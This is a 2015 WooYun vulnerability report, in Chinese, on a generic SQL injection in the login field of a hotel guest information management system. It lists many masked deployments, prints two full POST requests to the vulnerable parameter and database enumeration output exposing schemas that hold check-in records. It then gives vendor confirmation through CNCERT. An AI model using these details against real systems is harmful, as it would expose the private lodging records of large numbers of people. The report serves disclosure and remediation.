当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147556

漏洞标题:开房信息安全之某社会信息采集平台旅馆信息管理系统通用SQL注入漏洞(附大量案例)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-10-19 09:49

修复时间:2016-01-21 16:30

公开时间:2016-01-21 16:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-19: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-17: 细节向核心白帽子及相关领域专家公开
2015-12-27: 细节向普通白帽子公开
2016-01-06: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

开房信息安全之某社会信息采集平台之旅馆信息管理系统通用SQL注入漏洞
PS: 你还在为没有开房信息而担忧困扰么

详细说明:

之前发现这个系统存在弱口令导致的海量开房信息泄漏。具体可见http://**.**.**.**/bugs/wooyun-2010-0136212
http://**.**.**.**/bugs/wooyun-2010-0136013
http://**.**.**.**/bugs/wooyun-2010-0112009
等等。
意外发现由北京航天金盾科技有限公司研发的社会信息采集平台-旅馆信息管理系统存在通用SQL注入漏洞,涉及大量开放信息,危害较大。
系统架构:ASPX+oracle
漏洞问题:SQL注入漏洞
漏洞文件:/Login.aspx
注入参数:tbUser
或许别人都没注意这个系统其实用的比较广泛,内外网都有。动手找了下,内网就算了,公网系统列举部分如下:
**.**.**.**/hotelbs/default.aspx
**.**.**.**/hotelbs/default.aspx
**.**.**.**/hotelbs/default.aspx
**.**.**.**/hotelbs/default.aspx
http://**.**.**.**:8888/hotelbs/default.aspx
**.**.**.**:8080/hotelbs/Login.aspx
**.**.**.**/hotelbs/default.aspx
**.**.**.**/hotelbs/default.aspx
**.**.**.**/hotelbs164/default.aspx
**.**.**.**:9080/hotelbs164/default.aspx
**.**.**.**/hotelbs/default.aspx
**.**.**.**/hotelbs/default.aspx
**.**.**.**/hotelbs/default.aspx
**.**.**.**:9080/hotelbs164/default.aspx
**.**.**.**/hotelbs/default.aspx
http://**.**.**.**/default.aspx
**.**.**.**/**.**.**.**/
**.**.**.**:8090/hotelbs/Login.aspx
**.**.**.**:235/dylg/**.**.**.**/
http://**.**.**.**:235/dylgy/login.aspx
**.**.**.**:9090/Login.aspx
http://**.**.**.**/default.aspx
**.**.**.**:88/default.aspx
**.**.**.**/default.aspx
等等。
测试了都存在注入问题。
举例验证下吧:
如:**.**.**.**/hotelbs/Login.aspx

11.png


POST /hotelbs/Login.aspx HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: **.**.**.**/hotelbs/Login.aspx
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: **.**.**.**
Content-Length: 854
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=p44xkz2zh14zes45lvc2qsmb
smMain=upTimer|ibtLogin&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE1NjIxNDg0NjUPZBYCAgMPZBYCAgMPZBYCZg9kFgQCAQ9kFgQCAQ8PZBYCHgpvbktleVByZXNzBR1OZXh0Rm9jdXMoZXZlbnQsJ3RiUGFzc3dvcmQnKWQCBQ8PZBYCHwAFXWlmKGV2ZW50LmtleUNvZGU9PTEzKSB7IHZhciBidG5Mb2dpbj1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnaWJ0TG9naW4nKTsgYnRuTG9naW4uY2xpY2soKTsgfWQCAw8PFgIeB1Zpc2libGVoFgIeB29uY2xpY2sFLW9wZW5XaW5kb3dFZHooJ3BvbGljZW1hbmlkY2FyZC5hc3B4P3R5cGU9MScpO2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCGlidExvZ2luF2UlMdPt0ZLKOPUi2%2BGLhhQlGLk%3D&__VIEWSTATEGENERATOR=5C4684BD&__EVENTVALIDATION=%2FwEWCwKxv9GtBgLGvdL3AQKr8tnHBgK3jsrkBAKM54rGBgLL%2FYu6AwKt6sazBAKu4tDbCgLDvJbUCgLvz4aZDgLavZ2gCrFNJVVkLTgGWyyYkOBQZZJkWBdn&tbUser=dasd&tbPassword=dasdsa&hdCert=&hdSSL=&hdSerial=&hdUrl=http%3A%2F%2F**.**.**.**%2Fhotelbs%2F&stationID=&scanType=&ibtLogin.x=28&ibtLogin.y=15


11.png


涉及数据库26个:

available databases [26]:
[*] "SYS"
[*] CTXSYS
[*] DBSNMP
[*] DDYSYS
[*] DMSYS
[*] ESJSYS
[*] EXFSYS
[*] FJJSSGYSYS
[*] HOTELBS
[*] JXYSYS
[*] KSYSYS
[*] MANSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SPECIALUSEROUT
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] WTJMYSYS
[*] XDB
[*] YLYSYS
[*] YZYSYS


大量数据存放于SPECIALUSEROUT数据库及HOTELBS中

Database: SPECIALUSEROUT
[19 tables]
+---------------------+
| DATACENTER          |
| DEFUPDATE           |
| DIALPHONE           |
| EXTRACTLOG          |
| FZXX                |
| HOTEL               |
| HOTEL_141           |
| MESSAGE             |
| MSGFEEDBACK         |
| RECEIVELOG          |
| SENDLOG             |
| STATIONLIST         |
| STATIONLIST20150529 |
| STATIONLIST_LL      |
| STATIONLIST_NEW     |
| STATIONLIST_S       |
| STATIONLIST_SS      |
| T2                  |
| T3                  |
+---------------------+


再或者:
**.**.**.**:8080/hotelbs/Login.aspx

11.png


POST /hotelbs/Login.aspx HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: **.**.**.**:8080/hotelbs/Login.aspx
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/7.0)
Host: **.**.**.**:8080
Content-Length: 840
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=upqudpeyckpgh3ndankezt3a
smMain=upTimer|ibtLogin&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTM3MjI1OTM0NA9kFgICAw9kFgICAw9kFgJmD2QWBAIBD2QWBAIBDw9kFgIeCm9uS2V5UHJlc3MFHU5leHRGb2N1cyhldmVudCwndGJQYXNzd29yZCcpZAIFDw9kFgIfAAVdaWYoZXZlbnQua2V5Q29kZT09MTMpIHsgdmFyIGJ0bkxvZ2luPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdpYnRMb2dpbicpOyBidG5Mb2dpbi5jbGljaygpOyB9ZAIDDw8WAh4HVmlzaWJsZWgWAh4Hb25jbGljawUtb3BlbldpbmRvd0VkeigncG9saWNlbWFuaWRjYXJkLmFzcHg%2FdHlwZT0xJyk7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIaWJ0TG9naW5NivBG5%2Fq0vKzajP8hBaq5VFL%2FoQ%3D%3D&__EVENTVALIDATION=%2FwEWCwK61ri%2BDQLGvdL3AQKr8tnHBgK3jsrkBAKM54rGBgLL%2FYu6AwKt6sazBAKu4tDbCgLDvJbUCgLvz4aZDgLavZ2gCmLVRsrSAJUQLp4Lntals7A%2FzRRb&tbUser=dasdasd&tbPassword=dasdadsads&hdCert=&hdSSL=&hdSerial=&hdUrl=http%3A%2F%2F**.**.**.**%2Fhotelbs%2F&stationID=&scanType=&ibtLogin.x=43&ibtLogin.y=10


11.png


数据库:

11.png


漏洞证明:

如上所述!

修复方案:

系统很老了 升级过滤下吧

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-23 16:26

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后
续提供解决方案并协调相关用户单位处置。

最新状态:

暂无